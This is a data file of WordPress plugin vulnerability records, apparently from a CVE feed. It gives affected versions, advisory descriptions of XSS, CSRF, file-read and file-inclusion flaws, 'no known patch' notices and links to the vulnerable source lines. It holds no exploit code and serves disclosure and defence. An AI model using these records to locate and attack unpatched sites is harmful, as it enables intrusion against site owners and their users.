{"CVE_ID":"CVE-2024-10294","slug":"ce21-suite","versionImpact":"2.2.0","description":"The CE21 Suite plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'ce21_single_sign_on_save_api_settings' function in versions up to, and including, 2.2.0. This makes it possible for unauthenticated attackers to change plugin settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd6ce97c-fd80-4c43-a4d2-02aa91d11fac?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd6ce97c-fd80-4c43-a4d2-02aa91d11fac?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ce21-suite\\\/trunk\\\/includes\\\/ce21-functions.php?rev=3097700#L340\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ce21-suite\\\/trunk\\\/includes\\\/ce21-functions.php?rev=3097700#L340\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12341","slug":"custom-skins-contact-form-7","versionImpact":"1.0","description":"The Custom Skins Contact Form 7 plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'cf7cs_action_callback' function in all versions up to, and including, 1.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the content of any post and create new skins.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-skins-contact-form-7\\\/trunk\\\/custom-skins-contact-form-7.php#L182\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-skins-contact-form-7\\\/trunk\\\/custom-skins-contact-form-7.php#L182\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1cee249d-0a0e-4675-9e35-3a177a3b74a2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1cee249d-0a0e-4675-9e35-3a177a3b74a2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13700","slug":"embed-swagger-ui","versionImpact":"1.0.0","description":"The Embed Swagger UI plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wpsgui' shortcode in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/embed-swagger-ui\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/embed-swagger-ui\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20e2454f-f49b-413f-ae45-8b628b30a780?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20e2454f-f49b-413f-ae45-8b628b30a780?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0924","slug":"wp-security-audit-log","versionImpact":"5.2.2","description":"The WP Activity Log plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018message\u2019 parameter in all versions up to, and including, 5.2.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-security-audit-log\\\/trunk\\\/classes\\\/Controllers\\\/class-alert.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-security-audit-log\\\/trunk\\\/classes\\\/Controllers\\\/class-alert.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-security-audit-log\\\/trunk\\\/classes\\\/Controllers\\\/class-alert-manager.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-security-audit-log\\\/trunk\\\/classes\\\/Controllers\\\/class-alert-manager.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3238760\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3238760\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-security-audit-log\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-security-audit-log\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/91699d32-1768-4d87-a4f2-91969b3e3355?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/91699d32-1768-4d87-a4f2-91969b3e3355?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8243","slug":"wordpressplugin-upgrade-time-out-plugin","versionImpact":"1.0","description":"The WordPress\/Plugin Upgrade Time Out Plugin WordPress plugin through 1.0 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8e1e2d8d-41aa-49bc-95d5-dae75be788d5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8e1e2d8d-41aa-49bc-95d5-dae75be788d5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5143","slug":"posts-table-filterable","versionImpact":"1.0.4.1","description":"The TableOn \u2013 WordPress Posts Table Filterable plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's tableon_popup_iframe_button shortcode in all versions up to, and including, 1.0.4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/posts-table-filterable\\\/trunk\\\/index.php#L1630\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/posts-table-filterable\\\/trunk\\\/index.php#L1630\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3315337\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3315337\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/posts-table-filterable\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/posts-table-filterable\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/447d3aa6-2ed3-4da3-b9e8-fc7792c8c29a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/447d3aa6-2ed3-4da3-b9e8-fc7792c8c29a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7687","slug":"latest-post-accordian-slider","versionImpact":"1.3","description":"The Latest Post Accordian Slider plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3. This is due to missing or incorrect nonce validation on the 'lpaccordian' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/latest-post-accordian-slider\\\/trunk\\\/lpaccordian.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/latest-post-accordian-slider\\\/trunk\\\/lpaccordian.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/04a2c05a-11bb-450e-9ce9-783685730573?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/04a2c05a-11bb-450e-9ce9-783685730573?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1469","slug":"wp-express-checkout","versionImpact":"2.2.8","description":"The WP Express Checkout plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018pec_coupon[code]\u2019 parameter in versions up to, and including, 2.2.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with administrator-level access to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Note: This can potentially be exploited by lower-privileged users if the `Admin Dashboard Access Permission` setting is set for those users to access the dashboard.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b35ee801-f04d-4b22-8238-053b02a6ee0c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b35ee801-f04d-4b22-8238-053b02a6ee0c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2879453%40wp-express-checkout&new=2879453%40wp-express-checkout&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2879453%40wp-express-checkout&new=2879453%40wp-express-checkout&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2450","slug":"ajax-search-for-woocommerce","versionImpact":"1.23.0","description":"The FiboSearch - AJAX Search for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 1.23.0  due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fajax-search-for-woocommerce%2Ftags%2F1.23.0&old=2917453&new_path=%2Fajax-search-for-woocommerce%2Ftags%2F1.24.0&new=2917453&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fajax-search-for-woocommerce%2Ftags%2F1.23.0&old=2917453&new_path=%2Fajax-search-for-woocommerce%2Ftags%2F1.24.0&new=2917453&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ajax-search-for-woocommerce\\\/tags\\\/1.23.0\\\/includes\\\/Helpers.php#L1229\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ajax-search-for-woocommerce\\\/tags\\\/1.23.0\\\/includes\\\/Helpers.php#L1229\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/880573d8-6dad-4a1b-a5db-33e1dc243062?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/880573d8-6dad-4a1b-a5db-33e1dc243062?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4424","slug":"slider-hero","versionImpact":"8.2.0","description":"The Slider Hero plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 8.2.0. This is due to missing or incorrect nonce validation on the qc_slider_hero_duplicate() function. This makes it possible for unauthenticated attackers to duplicate slides via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2548890\\\/slider-hero\\\/trunk\\\/qcld-slider-main.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2548890\\\/slider-hero\\\/trunk\\\/qcld-slider-main.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e6d195cd-4df8-4926-b834-d695fc05f81d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e6d195cd-4df8-4926-b834-d695fc05f81d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5125","slug":"formget-contact-form","versionImpact":"5.5.5","description":"The Contact Form by FormGet plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'formget' shortcode in versions up to, and including, 5.5.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/formget-contact-form\\\/trunk\\\/index.php?rev=2145639#L504\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/formget-contact-form\\\/trunk\\\/index.php?rev=2145639#L504\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fdd73289-f292-4903-951e-6a89049d39a7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fdd73289-f292-4903-951e-6a89049d39a7?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-1563","slug":"wp-graphql-woocommerce","versionImpact":"0.11.0","description":"The WPGraphQL WooCommerce WordPress plugin before 0.12.4 does not prevent unauthenticated attackers from enumerating a shop's coupon codes and values via GraphQL.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/19138092-50d3-4d63-97c5-aa8e1ce39456\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/19138092-50d3-4d63-97c5-aa8e1ce39456\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-graphql\\\/wp-graphql-woocommerce\\\/\",\"name\":\"https:\\\/\\\/github.com\\\/wp-graphql\\\/wp-graphql-woocommerce\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1909","slug":"categorify","versionImpact":"1.0.7.4","description":"The Categorify plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.7.4. This is due to missing or incorrect nonce validation on the categorifyAjaxRenameCategory function. This makes it possible for unauthenticated attackers to rename categories via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58b29729-e9c3-4d57-affd-6142dfa8cc6f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58b29729-e9c3-4d57-affd-6142dfa8cc6f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034410\\\/categorify\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034410\\\/categorify\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1717","slug":"admin-notices-manager","versionImpact":"1.4.0","description":"The Admin Notices Manager plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the handle_ajax_call() function in all versions up to, and including, 1.4.0. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve a list of registered user emails.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0849d86b-5cf1-4346-a9e9-a54768837969?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0849d86b-5cf1-4346-a9e9-a54768837969?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/admin-notices-manager\\\/trunk\\\/vendor\\\/wpwhitesecurity\\\/select2-wpwhitesecurity\\\/load.php#L58\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/admin-notices-manager\\\/trunk\\\/vendor\\\/wpwhitesecurity\\\/select2-wpwhitesecurity\\\/load.php#L58\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6024","slug":"contentlock","versionImpact":"1.0.3","description":"The ContentLock WordPress plugin through 1.0.3 does not have CSRF check in place when deleting groups or emails, which could allow attackers to make a logged in admin remove them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3d2cdb4f-b7e1-4691-90d1-cddde7f5858e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3d2cdb4f-b7e1-4691-90d1-cddde7f5858e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-3556","slug":"cab-fare-calculator","versionImpact":"1.1.6","description":"The Cab fare calculator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the vehicle title setting in versions up to, and including, 1.1.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with administrative privileges to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/219de193-32d0-40b0-a471-bf8bf6e2bb62?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/219de193-32d0-40b0-a471-bf8bf6e2bb62?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cab-fare-calculator\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cab-fare-calculator\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9228","slug":"loggedin","versionImpact":"1.3.1","description":"The Loggedin \u2013 Limit Active Logins plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.3.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. This is only exploitable when the leave a review notice is present.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59707c64-a34c-45bc-bbbe-d447fe2ca6ab?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59707c64-a34c-45bc-bbbe-d447fe2ca6ab?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/loggedin\\\/tags\\\/1.3.1\\\/includes\\\/class-loggedin-admin.php#L255\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/loggedin\\\/tags\\\/1.3.1\\\/includes\\\/class-loggedin-admin.php#L255\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-49302","slug":"uber-grid","versionImpact":"1.1.7","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Portfoliohub WordPress Portfolio Builder \u2013 Portfolio Gallery allows Stored XSS.This issue affects WordPress Portfolio Builder \u2013 Portfolio Gallery: from n\/a through 1.1.7.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/uber-grid\\\/wordpress-wordpress-portfolio-builder-portfolio-gallery-plugin-1-1-7-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/uber-grid\\\/wordpress-wordpress-portfolio-builder-portfolio-gallery-plugin-1-1-7-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10285","slug":"ce21-suite","versionImpact":"2.2.0","description":"The CE21 Suite plugin for WordPress is vulnerable to sensitive information disclosure via the plugin-log.txt in versions up to, and including, 2.2.0. This makes it possible for unauthenticated attackers to log in the user associated with the JWT token.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/618a9ad7-3a13-43e6-84f4-35287f07e1c0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/618a9ad7-3a13-43e6-84f4-35287f07e1c0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ce21-suite\\\/trunk\\\/single-sign-on-ce21.php?rev=3097700#L237\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ce21-suite\\\/trunk\\\/single-sign-on-ce21.php?rev=3097700#L237\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ce21-suite\\\/trunk\\\/single-sign-on-ce21.php?rev=3097700#L281\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ce21-suite\\\/trunk\\\/single-sign-on-ce21.php?rev=3097700#L281\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13671","slug":"music-sheet-viewer","versionImpact":"4.1","description":"The Music Sheet Viewer plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 4.1 via the read_score_file() function. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/music-sheet-viewer\\\/trunk\\\/music-sheet-viewer.php#L748\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/music-sheet-viewer\\\/trunk\\\/music-sheet-viewer.php#L748\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/569f1cd4-195b-41d4-85cb-f529a1eb18d4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/569f1cd4-195b-41d4-85cb-f529a1eb18d4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13851","slug":"modal-portfolio","versionImpact":"1.7.4.2","description":"The Modal Portfolio plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.7.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/modal-portfolio\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/modal-portfolio\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc049cab-6793-4656-9b17-8ca64c566c4c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc049cab-6793-4656-9b17-8ca64c566c4c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12563","slug":"s2member-pro","versionImpact":"250214","description":"The s2Member Pro plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 250214 via the 'template' attribute. This makes it possible for authenticated attackers, with contributor-level and above permissions, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/s2member.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/s2member.com\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3326e9d-504f-444f-baf7-03989594f483?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3326e9d-504f-444f-baf7-03989594f483?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
